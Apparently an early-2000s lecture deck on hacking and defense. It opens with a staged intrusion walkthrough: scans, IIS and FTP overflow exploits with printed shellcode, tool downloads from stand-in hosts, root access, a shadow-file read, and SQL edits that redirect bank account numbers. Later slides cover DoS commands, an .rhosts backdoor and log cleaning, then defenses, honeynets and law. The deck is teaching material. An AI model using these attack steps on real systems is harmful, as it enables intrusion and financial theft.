
Hacking

hacker.com:~$ nslookup
Default Server: ns.hacker.com
Address: 3.1.33.7
> www.billionaireshow.com
Non-authoritative answer:
Name:    www.billionaireshow.com
Address: 172.16.16.5
> exit
hacker.com:~$ nmap -sS 172.16.16.5
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on www.billionaireshow.com (172.16.16.5):
(The 1514 ports scanned but not shown below are in state: closed)
Port      State  Service
80/tcp    open   http
135/tcp   open   loc-srv
139/tcp   open   netbios-ssn
445/tcp   open   microsoft-ds
1080/tcp  open   socks
8080/tcp  open   http-proxy

Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds


hacker.com:~$ telnet 172.16.16.5 80
Trying 172.16.16.5...
Connected to 172.16.16.5.
Escape character is '^]'.

HEAD / HTTP/1.0
HTTP/1.1 200 OK
Content-Length: 2506
Date: Mon, 01 Oct 2001 15:04:41 GMT
Content-Location: http://172.16.16.5/postinfo.html
Content-Type: text/html
Server: Microsoft-IIS/5.0
Accept-Ranges: bytes
Last-Modified: Mon, 01 Oct 2001 11:06:52 GMT
ETag: "20c1bf347cfc01:941"
Connection closed by foreign host.
hacker.com:~$ ./idaexploit.sh 172.16.16.5
Connecting . . .
Dumping Shell:
\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x=
1c\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04\x90\x90\x90\xac\=
x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c=
\x6b\xbd\xd9\x99\x14\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4=
\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9\x99\xcf\x14\x2c\x6=
8\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x=
99\x99\x14\x2c\x6c\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf\=
xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf\xd9\x99\x34\xc9\x66=

\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x9=
9\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x=
99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\=
x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99=
\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99\x89\x99\x99\x99\x9=
9\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x90\x90\x90\x=
90\x90\x90\x90\x90
Done...
Completing...
...
GET /test.ida?`perl -e 'print "N"x230'`
%u0101%u00b5%u0101%u00b5%u0101%u00b=5%u0101%u00b5=3Dx HTTP/1.0
...
GET /test.ida?`perl -e 'print "N"x230'`%u0abf%u00b6%u0abf%u00b6%u0abf%u00b6=
%u0abf%u00b6=3Dx HTTP/1.0
...
yahoo: `perl -e 'print "\x90"x11800'`$SHELLCODE=20
ini.TINY:
Binding cmd.exe: PORT 80...
Finished...ENJOY!
C:\WINNT\system32>
C:\WINNT\system32> cd ..
C:\WINNT> dir
Volume in drive C has no label.
Volume Serial Number is 6446-0F57

Directory of C:\WINNT
08/24/2001  07:23p                  36 vb.ini
08/24/2001  07:23p                  37 vbaddin.ini
12/06/1999  05:00p              20,240 vmmreg32.dll
12/06/1999  05:00p             366,864 welcome.exe
12/06/1999  05:00p                  23 welcome.ini
09/07/2001  02:00p                 348 win.ini
12/06/1999  05:00p             256,192 winhelp.exe
07/21/2000  12:05p             269,584 winhlp32.exe
07/21/2000  12:05p             193,296 winrep.exe
09/28/2001  04:41p             288,880 WMSysPrx.prx
12/06/1999  05:00p               9,522 Zapotec.bmp
12/06/1999  05:00p                 707 _default.pif
              70 File(s)      3,934,990 bytes
              29 Dir(s)   7,330,738,176 bytes free
C:\WINNT\system32>
C:\WINNT\system32> tftp.exe -i hackerbox.com GET nmap.exe c:\temp\nmap.exe
C:\WINNT\system32> cd \temp
C:\temp> nmap -sP 172.16.16.1-255
Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/)
Host www.billionaireshow.com (172.16.16.5) appears to be up.
Host itguy.billionaireshow.com (172.16.16.176) appears to be up.
Nmap run completed -- 255 IP addresses (2 host(s) up) scanned in 7 second
C:\temp>

C:\temp> nmap -O 172.16.16.176


Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Interesting ports on itguy.billionaireshow.com (172.16.16.176):
(The 1514 ports scanned but not shown below are in state: closed)
Port      State  Service
21/tcp    open   ftpd
22/tcp    open   ssh
4045/tcp  open   lockd
6112/tcp  open   dtspc

TCP Sequence Prediction: Class=random positive increments


Difficulty=33565 (Worthy challenge)
Remote OS guesses: Solaris 8
Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds
C:\temp> ftp 172.16.16.176
Connected to 172.16.16.176.
220 itguy.billionaireshow.com FTP server ready.
Name (172.16.16.176:hacker): ^C
C:\temp> perl glob.pl 172.16.16.176 anonymous glob@glob.com
RET: 0xbfbfeae8
Align: 1
RET: 0x805baf8
Align: 1
RET: 0x805e23a
Align: 1
220 itguy.billionaireshow.com FTP server (Version 6.00LS) ready.
Logged in as anonymous/glob@glob.com. Sending evil STAT command.

Exploit Starting...
\x31\xc0\x99\x52\x52\xb0\x17\xcd\x80\x68\xcc\x73\x68\xcc\x68
\xcc\x62\x69\x6e\xb3\x2e\xfe\xc3\x88\x1c\x24\x88\x5c\x24\x04
\x88\x54\x24\x07\x89\xe6\x8d\x5e\x0c\xc6\x03\x2e\x88\x53\x01
\x4e\x0c\x52\x51\x56\x52\xb0\x3b\xcd\x80\xc9\xc3\x55\x89\xe5
\x83\xec\x08\xeb\x12\xa1\x3c\x50\x90
Exploit finished.. ENJOY!
# whoami
root
#

Solaris 8

# nslookup
Default Server: billionaireshow.com
Address: 172.16.15.2
> ls billionaireshow.com
[billionaireshow.com]
billionaireshow.com.
billionaireshow.com.
billiondollar
ap.billionaireshow.com
game.ec.billionaireshow.com
> exit
#

NS server = ns.billionaireshow.com
NS server = game.ec.billionaireshow.com
MX server = mail.billionaireshow.com
A
172.16.7.14
A
172.16.7.22

Accounts Payable

# telnet 172.16.6.14 22
Trying 172.16.16.14...
Connected to 172.16.16.14.
Escape character is '^]'.
SSH-2.0-3.0.0 SSH Secure Shell (non-commercial)

Connection closed by foreign host.


# ssh -l lp ap.billionaireshow.com
lp's password:
Authentication successful.
Last login: Sun Mar 28 2001 16:43:05 -0500 from 209.134.176.54
lp@AP /home$
lp@AP /home$ uname -a
SunOS ap 5.8 Generic_105181-23 sun4u sparc SUNW,UltraSPARC-IIi-Engine
lp@AP /home$

lp@AP /home$ cd /
lp@AP /$ ls
bam         boot  etc   idxs  lost+found  oracle9  root  tmp  vakkk
bin         dev   home  lib   mnt         proc     sbin  usr  var
lp@AP /home$ cd /tmp


lp@AP /tmp$ ftp hackertoolz.com
Connected to hackertoolz.com.
220 SMACK FTP server (Version 5.6(1) Tue Jun 27 10:52:28 PDT 2000) ready.
Name (hackertoolz.com:lp): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> get dtprintinfoBO.c

200 PORT command successful.
150 ASCII data connection for chghost (hackertoolz.com,32793) (1511 bytes).
226 ASCII Transfer complete.
local: dtprintinfoBO.c remote: dtprintinfoBO.c
1558 bytes received in 0.014 seconds (107.57 Kbytes/s)
ftp> bye
221 Goodbye.
lp@ap /tmp$ gcc -o sploit dtprintinfoBO.c
lp@ap /tmp$ ./sploit
HACKBOX...admintool Overflow Exploits.
creating...ADJUST1::2.......done
creating...ADJUST2::1.......done
creating...BUFSIZE1::1000.......done
creating...BUFSIZE2::800.......done
creating...OFFSET::3600.......done
creating...OFFSET2::400....done
Sending Shell.......
\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68
\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x10\x20\x10\x94\x22\xa0\x10
\x9c\x03\xa0\x14\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0
\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82
\x10\x20\x01\x91\xd0\x20\x08
....done

ENJOY YOUR NEW BOX!


# whoami
root
#
# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:/bin/bash
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
# head /etc/shadow
root:h1QbJ57QWWmVY:11177:0:::::
bin:*:11038:0:99999:7:::
daemon:*:11038:0:99999:7:::
adm:*:11038:0:99999:7:::
lp:*:11038:0:99999:7:::
sync:*:11038:0:99999:7:::
shutdown:*:11038:0:99999:7:::
halt:*:11038:0:99999:7:::
mail:*:11038:0:99999:7:::
#

# sqlplus
SQL> describe accounts
Name              Null?     Type
----------------- --------  ------------
LNAME             NOT NULL  VARCHAR2(20)
FNAME             NOT NULL  VARCHAR2(15)
ADDR1             NOT NULL  VARCHAR2(30)
ADDR2             NOT NULL  VARCHAR2(30)
ZIP               NOT NULL  NUMBER(5)
PHONE             NOT NULL  CHAR(12)
SSN               NOT NULL  NUMBER(9)
BANK              NOT NULL  VARCHAR2(30)
ROUTING_NUM       NOT NULL  NUMBER(9)
ACCOUNT_NUM       NOT NULL  NUMBER(12)

SQL> select ACCOUNT_NUM, ROUTING_NUM from accounts

ACCOUNT_NUM  ROUTING_NUM
-----------  -----------
8811101011   060101015
8822822281   060192911
4922929481   069882211
5594492295   069592215
6839186571   062798581
3985792816   061873710
0985949922   320984581
2092028481   204098285
6096780914   098029820
4098320921   450982091
6098509449   095098209
4090921109   609830329
6987329810   908848828
4987298731   984598472
5098222091   095509860
0983039311   098098571
SQL> update accounts set ACCOUNT_NUM = 0069858915 where LNAME = '*';
SQL> update accounts set ROUTING_NUM = 6695922941 where LNAME = '*';
SQL> select LNAME, ACCOUNT_NUM, ROUTING_NUM from accounts where LNAME = '*';

LNAME        ACCOUNT_NUM  ROUTING_NUM
-----------  -----------  -----------
Young        0069858915   6695922941
Varick       0069858915   6695922941
Brantley     0069858915   6695922941
Weinstein    0069858915   6695922941
Davis        0069858915   6695922941
Reynard      0069858915   6695922941
Halpert      0069858915   6695922941
Davis        0069858915   6695922941
Kennedy      0069858915   6695922941
Scott        0069858915   6695922941
Michaels     0069858915   6695922941
Noojin       0069858915   6695922941

The current state of the Internet


An unprotected computer on the
Internet WILL BE EXPLOITED
within 24 hours!
Richard Treece, ISS, 15 April 2002

Hacker Techniques

Find and attack the weakest link


Reconnaissance
Gain access to first machine
Use acquired access to gain further access

Disclaimer
Hacking is illegal!
Some actual organizations and computers are
used in the examples,
but only to provide realism

Do not hack the examples!

The Stages of a Network Intrusion
1. Scan:
   IP addresses in use,
   operating system in use,
   open TCP or UDP ports
2. Exploit:
   Denial of Service (DoS)
   scripts against open ports
3. Gain Root Privilege:
   Buffer Overflows
   Get Root/Administrator Password
4. Install Back Door
5. Use IRC (Internet Relay Chat)


Reconnaissance
Public information
www
news postings

Network Scanning
Operating System Detection

War-dialing

Public Info: www.internic.net


Domain Name: GATECH.EDU
Registrant:
Georgia Institute of Technology, 258 4TH St, Atlanta,
GA 30332
Contacts:
Administrative Contact: Herbert Baines III
GA Institute of Tech (GATECH-DOM), 258 4TH St.,
Atlanta, GA 30332
(404) 894-0226, herbert.baines@oit.gatech.edu
Technical Contact: OIT, Georgia Tech 258 Fourth
Street Atlanta, GA 30332
(404) 894-0226, hostmaster@gatech.edu
Name Servers:
TROLL-GW.GATECH.EDU 130.207.244.251
GATECH.EDU 130.207.244.244
NS1.USG.EDU 198.72.72.10

Public Information: news postings


Author: rajeshb <rajeshb@ncs.com.sg>
Date: 1998/12/07
Forum: comp.unix.solaris
author posting history
Hi,
Could someone tell me how to configure anonymous ftp for
multiple IP addresses. Basically we are running virtual web
servers on one server. We need to configure anonymous ftp
for each virtual web account. I appreciate it if someone can
help me as soon as possible. I know how to configure an
anonymous ftp for single IP.
Thanks,
Rajesh.

Network Scanning
Identifies:
accessible machines
servers (ports) on those machines

Network Scanning (contd)


nmap -t -v hack.me.com
Port   Proto  Service
21     tcp    ftp
23     tcp    telnet
37     tcp    time
53     tcp    domain
70     tcp    gopher
79     tcp    finger
80     tcp    http
109    tcp    pop-2
110    tcp    pop-3
111    tcp    sunrpc
113    tcp    auth
143    tcp    imap
513    tcp    login
514    tcp    shell
635    tcp    unknown

Operating System Detection


Stack fingerprinting:
OS vendors often interpret specific RFC guidance differently when implementing their versions of the TCP/IP stack.
Probing for these differences gives an educated guess about the OS
e.g., FIN probe, Don't Fragment bit

nmap -O

War-dialing
Find the organization's modems by calling all of its phone numbers

www.fbi.gov: (202) 324-3000

Reverse Business Phone: 202-324-3
All Listings
Government Offices-US, US Field Ofc, 1900 Half St Sw, Washington, DC, 202-324-3000


Denial of Service (DOS)

(Source: Chapter 14, Network Intrusion Detection: An Analyst's Handbook, Second Edition, Northcutt and Novak)

1) SMURF: ICMP echos
2) ECHO-CHARGEN: UDP port 7 is echo; UDP port 19 is character generator.
   Spoof a source address and the two victims pound each other.
3) TEARDROP: send fragments with an offset that is too small
   source.40909 > target.3826: udp 28 (frag 242:36@0+)
   source.40909 > target.3826: 28 (frag 242:4@24)
   Fragment ID = 242 with 36 bytes of data starting at offset 0.
   Fragment ID = 242 with 4 bytes of data starting at offset 24,
   but this means we must back up from the 36 bytes already received to offset 24, where this fragment goes.
   The resulting negative length may look like a large positive number and be written into another program's section of memory.
   If the intrusion detection system (IDS) does not support packet reassembly checks, the attack will get past the IDS.

Denial of Service (DOS)

4) PING OF DEATH: on a Windows NT box type
   ping -l 65510 <victim IP address>
   This creates a packet that, when reassembled, is larger than the maximum size of 65,535 that is allowed. Causes a system crash.
   - Max IP packet size allowed = 65535
   - ICMP echo has a pseudo header consisting of 8 bytes of ICMP header info
   - Next in the ICMP packet is the ping data that is sent
   - Maximum amount of data that can be sent is 65535 - 20 (IP) - 8 (ICMP) = 65507
   - We sent 65510, which is too large
5) LAND ATTACK: source IP address/port equals destination IP address/port
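As an added illustration of the teardrop, ping of death and land conditions described above (example code written for this page, not from the Northcutt and Novak source or from any IDS), the following C program does the header arithmetic an IDS needs before it reassembles anything: it walks a list of fragments and refuses one that starts before data already received or that would push the datagram past 65,535 bytes, computes the 65507-byte ping data limit, and flags a packet whose source equals its destination. The struct layout is this example's own; the sample fragments are constructed from the two tcpdump lines on the slide, with byte offsets taken as the slide prints them.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define IP_MAX_DATAGRAM 65535u   /* largest total length an IPv4 datagram may have */
#define IP_HDR_LEN      20u      /* minimal IPv4 header, as the slide assumes */
#define ICMP_HDR_LEN    8u       /* ICMP echo header */

/* One fragment as an IDS sees it: fragment id, byte offset of its payload inside
   the reassembled datagram payload (the slide prints "36 @ 0+"), payload length,
   and whether the More Fragments flag ("+") is set. */
struct frag {
    uint16_t id;
    uint32_t offset;
    uint32_t len;
    int more;
};

enum frag_verdict {
    FRAG_OK = 0,
    FRAG_OVERLAP = 1,    /* teardrop: fragment starts before data already received */
    FRAG_OVERSIZE = 2,   /* ping of death: reassembled datagram would exceed 65535 */
    FRAG_MIXED_ID = 3    /* fragments from different datagrams were passed together */
};

/* Walk the fragments in arrival order and track how far the payload has been
   filled. Both conditions are decided from the headers alone, before any
   reassembly buffer is touched, which is the check the slide says an IDS needs. */
enum frag_verdict check_fragments(const struct frag *f, size_t n)
{
    uint32_t end = 0;   /* end of the data received so far */
    for (size_t i = 0; i < n; i++) {
        if (f[i].id != f[0].id)
            return FRAG_MIXED_ID;
        if (f[i].offset < end)            /* "back up from 36 to 24" */
            return FRAG_OVERLAP;
        if (IP_HDR_LEN + f[i].offset + f[i].len > IP_MAX_DATAGRAM)
            return FRAG_OVERSIZE;
        end = f[i].offset + f[i].len;
    }
    return FRAG_OK;
}

/* Largest ICMP echo data size that still fits one datagram: 65535 - 20 - 8. */
uint32_t max_ping_data(void)
{
    return IP_MAX_DATAGRAM - IP_HDR_LEN - ICMP_HDR_LEN;
}

/* Land attack: source and destination address and port are identical. */
int is_land_packet(uint32_t src_ip, uint16_t src_port, uint32_t dst_ip, uint16_t dst_port)
{
    return src_ip == dst_ip && src_port == dst_port;
}

int main(void)
{
    /* Constructed from the two tcpdump lines on the slide. */
    struct frag teardrop[] = { {242, 0, 36, 1}, {242, 24, 4, 0} };
    /* ping -l 65510 sends 8 bytes of ICMP header plus 65510 bytes of data;
       shown here as a single fragment of the ICMP payload. */
    struct frag pod[] = { {1, 0, ICMP_HDR_LEN + 65510u, 0} };
    /* A well-formed two-fragment datagram for comparison. */
    struct frag normal[] = { {7, 0, 1480, 1}, {7, 1480, 100, 0} };

    printf("teardrop verdict: %d\n", check_fragments(teardrop, 2));
    printf("ping of death verdict: %d\n", check_fragments(pod, 1));
    printf("normal verdict: %d\n", check_fragments(normal, 2));
    printf("max ping data: %u\n", max_ping_data());
    printf("land: %d\n", is_land_packet(0x0A000001u, 139, 0x0A000001u, 139));
    return 0;
}
```

The verdict values are 1 (overlap) for the slide's teardrop pair, 2 (oversize) for the 65510-byte ping, and 0 for the well-formed pair; a real reassembler would additionally check that non-final fragments are multiples of 8 bytes, which the slide's 36-byte fragment is not.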

Denial of Service (DOS)


6) NMAP: scans looking for open ports. You may download it from www.insecure.org
   Can crash unpatched systems
   Can use many modes:
   - Vanilla TCP connect scanning
   - TCP SYN (half open) scanning
   - TCP FIN, xmas, or null (stealth) scanning
   - TCP ftp proxy (bounce attack) scanning (uses the ftp data port 20 to connect, even though no connection to port 21 was established first, as in the normal procedure)
   - SYN/FIN scanning using IP fragments
   - UDP raw ICMP port unreachable scanning
   - ICMP scanning (ping-sweep)
   - TCP ping scanning
   - Remote OS identification by TCP/IP fingerprinting

Distributed Denial of Service (DDOS)


Client machine is used to coordinate the attack
Master or Handler controls the subservient computers
Agents or Daemons actually do the attack
1) TRINOO: sends UDP floods to random destination port numbers on the victim
2) TFN: sends a UDP flood, TCP SYN flood, ICMP echo flood, or a SMURF attack.
   The master communicates with the daemon using ICMP echo reply, changing the IP identification number and payload of the ICMP echo reply to identify the type of attack to launch.
3) TFN2k: first DDOS for Windows. Communication between master and agents can be encrypted over TCP, UDP, or ICMP with no identifying ports
4) STACHELDRAHT: combination of Trinoo and TFN
If you are a DDOS victim, at present there is very little you can do about it!!!


The Holy Grail


Hackers seek superuser/root privilege (SUID) on the machine they are exploiting
With SUID privilege, they own the machine
They can use the resources available for their own purposes (e.g., crack passwords) or destroy data on the machine

Gaining SUID privilege


1. Easiest way: trying default manufacturer password settings
2. Next easiest: social engineering
   Impersonate tech support
   Hide trojan software inside free games, screensavers, etc. (e.g., Anna Kournikova)
3. More difficult: buffer overflow attack
   Must be a skilled programmer

Gain access to first machine


Configuration errors
System-software errors

Configuration errors: NFS


$ showmount -e hack.me.com
export list for hack.me.com:
/home (everyone)

Config errors: anonymous ftp (#1)


$ ftp hack.me.com
Connected to hack.me.com.
220 xyz FTP server (SunOS) ready.
Name (hack.me.com:jjyuill): anonymous
331 Guest login ok, send ident as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> get /etc/passwd
/etc/passwd: Permission denied
ftp> cd ../etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (152.1.75.170,32871) (0 bytes).
226 ASCII Transfer complete.

Config errors: anonymous ftp (#2)


ftp> get passwd
200 PORT command successful.
150 ASCII data connection for passwd (152.1.75.170,32872) (23608 bytes).
226 ASCII Transfer complete.
local: passwd remote: passwd
23962 bytes received in 0.14 seconds (1.7e+02 Kbytes/s)
ftp> quit
221 Goodbye.

Config errors: anonymous ftp (#3)


$ less passwd
sam:0Ke0ioGWcUIFg:100:10:NetAdm:/home/sam:/bin/csh
bob:m4ydEoLScDlqg:101:10:bob:/home/bob:/bin/csh
chris:iOD0dwTBKkeJw:102:10:chris:/home/chris:/bin/csh
sue:A981GnNzq.AfE:103:10:sue:/home/sue:/bin/csh
$ Crack passwd
Guessed sam [sam]
Guessed sue [hawaii]

System-software errors: imapd (#1)


imapd buffer-overflow
$ telnet hack.me.com 143
Trying hack.me.com...
Connected to hack.me.com
Escape character is '^]'.
* OK hack.me.com IMAP4rev1 v10.205 server ready
AUTH=KERBEROS

System-software errors: imapd (#2)


sizeof(mechanism) == 2048
sizeof(tmp) == 256

char *mail_auth (char *mechanism, authresponse_t resp, int argc, char *argv[])
{
  char tmp[MAILTMPLEN];
  AUTHENTICATOR *auth;
  /* make upper case copy of mechanism name */
  ucase (strcpy (tmp,mechanism));
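The same copy step rewritten with a length check, as an added example for this page (not the imapd source; MAILTMPLEN is assumed to be 256 as the slide states, and the AUTHENTICATOR lookup that follows in the real server is left out): a mechanism name that does not fit in the 256-byte stack buffer is rejected before anything is written, so the 2048-byte input from the slide can no longer run past the end of tmp.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAILTMPLEN 256   /* size of tmp[] in the slide's mail_auth(); assumed value */

/* Upper-case src into dst only if it fits, terminator included.
   Returns 1 on success; returns 0 (too long, or no room at all) with dst left as
   an empty string and nothing written beyond dst[0]. */
int ucase_copy_bounded(char *dst, size_t dstlen, const char *src)
{
    size_t n = strlen(src);
    if (dstlen == 0)
        return 0;
    if (n >= dstlen) {
        dst[0] = '\0';
        return 0;
    }
    for (size_t i = 0; i < n; i++)
        dst[i] = (char)toupper((unsigned char)src[i]);
    dst[n] = '\0';
    return 1;
}

/* The slide's step with the bounded copy in place of
       ucase (strcpy (tmp, mechanism));
   which copied the client-supplied name into tmp[MAILTMPLEN] with no size check.
   Returns 1 if the name was accepted (copied and upper-cased), 0 if rejected. */
int mail_auth_checked(const char *mechanism)
{
    char tmp[MAILTMPLEN];
    if (!ucase_copy_bounded(tmp, sizeof tmp, mechanism))
        return 0;
    /* the real server would now look the upper-cased name up in its
       AUTHENTICATOR table; not modelled here */
    return 1;
}

int main(void)
{
    char big[2048 + 1];                 /* a 2048-byte mechanism name, as on the slide */
    memset(big, 'A', 2048);
    big[2048] = '\0';
    printf("\"kerberos\" accepted: %d\n", mail_auth_checked("kerberos"));
    printf("2048-byte name accepted: %d\n", mail_auth_checked(big));
    return 0;
}
```

The rejection leaves the caller to answer the client with an error; the point is that the decision is taken on strlen(mechanism) against sizeof tmp before any byte is copied.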

Get further access (#1)


If user access, try to gain root
usually via a bug in a command which runs as root
e.g. lprm for RedHat 4.2 (4/20/98)

Run crack on /etc/passwd


users often have the same password on multiple machines

Get further access (#2)


Exploit misconfigured file permissions in a user's home directory
e.g. echo + + >> .rhosts
Format of entries: [+|-] [host] [+|-] [user]
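An added audit routine for that entry format (example code written for this page, not from any rlogin or rsh implementation): it classifies each .rhosts line by how much trust it grants and counts the wildcard entries in a constructed sample file, which is the check an administrator runs to find home directories where "+ +" has been appended. Netgroup entries of the form +@group are treated like named hosts, a simplification.

```c
#include <stdio.h>
#include <string.h>

/* Risk classes for one .rhosts entry, ordered from harmless to worst. */
enum rhosts_risk {
    RH_IGNORE = 0,          /* blank line or comment */
    RH_SPECIFIC = 1,        /* named host and (optionally) named user */
    RH_USER_WILDCARD = 2,   /* "host +": any user on that host */
    RH_HOST_WILDCARD = 3,   /* "+ user" or "+": that user from any host */
    RH_ANY = 4              /* "+ +": any user from any host, no password asked */
};

/* Classify one line in the "[+|-] [host] [+|-] [user]" form shown on the slide.
   A leading '-' on either field is a deny entry and is treated as specific. */
enum rhosts_risk audit_rhosts_line(const char *line)
{
    char host[64] = "", user[64] = "";
    int fields = sscanf(line, "%63s %63s", host, user);
    if (fields < 1 || host[0] == '#')
        return RH_IGNORE;
    int any_host = strcmp(host, "+") == 0;
    int any_user = fields == 2 && strcmp(user, "+") == 0;
    if (any_host && any_user) return RH_ANY;
    if (any_host)             return RH_HOST_WILDCARD;
    if (any_user)             return RH_USER_WILDCARD;
    return RH_SPECIFIC;
}

/* Count entries at or above a given risk class in a whole file's contents. */
int count_rhosts_at_least(const char *text, enum rhosts_risk threshold)
{
    int hits = 0;
    const char *p = text;
    while (*p != '\0') {
        const char *nl = strchr(p, '\n');
        size_t len = nl ? (size_t)(nl - p) : strlen(p);
        char line[256];
        if (len >= sizeof line)
            len = sizeof line - 1;   /* over-long lines are truncated, not skipped */
        memcpy(line, p, len);
        line[len] = '\0';
        if (audit_rhosts_line(line) >= threshold)
            hits++;
        p = nl ? nl + 1 : p + strlen(p);
    }
    return hits;
}

/* Constructed sample .rhosts for demonstration; none of these hosts exist. */
static const char SAMPLE_RHOSTS[] =
    "# trusted build host\n"
    "build.example.test bob\n"
    "backup.example.test +\n"
    "+ bob\n"
    "+ +\n";

int main(void)
{
    printf("entries with any wildcard: %d\n",
           count_rhosts_at_least(SAMPLE_RHOSTS, RH_USER_WILDCARD));
    printf("fully open entries: %d\n",
           count_rhosts_at_least(SAMPLE_RHOSTS, RH_ANY));
    return 0;
}
```

On the sample file the counts are 3 and 1. Run over every home directory, a non-zero RH_ANY count is exactly the "echo + + >> .rhosts" condition the slide describes, and it is found from the file alone, without any network probe.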

If root, install rootkits


Trojans, backdoors, sniffers, log cleaners

Packet Sniffing
ftp and telnet passwords
e-mail
Lotus Notes

Log cleaners
Start with syslog.conf, edit log files, Wzap wtmp file
Edit shell history file (or disable shell history)


Back Doors

Back Doors
1. Allows hackers to come back at their leisure.
2. Can exist at application level
   Back Orifice
3. Can exist at system level
   Replace dlls in NT system
   Replace functions in Linux/Unix, e.g. login, ps, etc.
4. Can exist at root level
   Most difficult to detect
5. Some root kits increase the security of a system and are used by network administrators on their own systems!

Packet Sniffing
(Network diagram: Internet, ISP, router, firewall, mail server, web and ftp server, and workstations)

Sniffing: Captured Passwords


Source IP.port - Destination IP.port
333.22.112.11.3903 - 333.22.111.15.23: login [root]
333.22.112.11.3903 - 333.22.111.15.23: password [sysadm#1]
333.22.112.11.3710 - 333.22.111.16.23: login [root]
333.22.112.11.3710 - 333.22.111.16.23: password [sysadm#1]
333.22.112.91.1075 - 333.22.112.94.23: login [lester]
333.22.112.91.1075 - 333.22.112.94.23: password [l2rz721]
333.22.112.64.1700 - 444.333.228.48.23: login [rcsproul]
333.22.112.64.1700 - 444.333.228.48.23: password [truck]


Internet Relay Chat


1. Some hackers, when they exploit a system,
announce it to the hacker community.
2. This is normally done by script kiddies as
bragging rights.
3. A sophisticated hacker on the other hand, will
most likely cover his/her tracks so that you will
never know that they got into your systems.

Hacker Techniques

Find and attack the weakest link


Reconnaissance
Gain access to first machine,
Use acquired access to gain further access

How to protect your computer


1. Make sure your software is current and up to date (i.e. all current patches are installed)
2. Run firewall software
   http://www.zonealarm.com
3. Run a hardware firewall
4. Run intrusion detection software
   SNORT http://www.snort.org
5. Run Tripwire (change tracking software)
   http://www.tripwire.com

Honeynets

Honeypots
A security resource whose value lies in being
probed, attacked or compromised.
Has no production value, anything going to
or from a honeypot is likely a probe, attack or
compromise.

Advantages / Disadvantages
Advantages
Reduce false negatives and false positives
Collect little data, but data of high value
Minimal resources
Conceptually simple
Disadvantages
Single point of failure
Risk

What is a Honeynet

High-interaction honeypot
Used primarily to learn about the bad guys.
Network of production systems.
Once compromised, the data collected is used
to learn the tools, tactics, and motives of the
blackhat community.

How it works
A highly controlled network where every
packet entering or leaving is monitored,
captured, and analyzed.
Any traffic entering or leaving the Honeynet
is suspect by nature.

http://project.honeynet.org/papers/honeynet/

Risk
Honeynets are highly complex, requiring
extensive resources and manpower to
properly maintain.
Honeynets are a high risk technology. As a
high interaction honeypot, they can be used
to attack or harm other non-Honeynet
systems.

Legal Issues
Privacy
Entrapment
Liability

Privacy
No single statute concerning privacy
Electronic Communication Privacy Act (18
USC 2701-11)
Federal Wiretap Statute (Title III, 18 USC
2510-22)
The Pen/Trap Statute (18 USC 3121-27)

Entrapment
Used only by defendant to avoid
conviction.
Cannot be held criminally liable for
entrapment.
Applies only to law enforcement
Even then, most legal authorities
consider Honeynets non-entrapment.

Upstream liability

Any organization may be liable if a Honeynet system is used to attack or damage other non-Honeynet systems.
Decided at state level, not federal
Civil issue, not criminal

This is why the Honeynet Project focuses so much attention on Data Control.
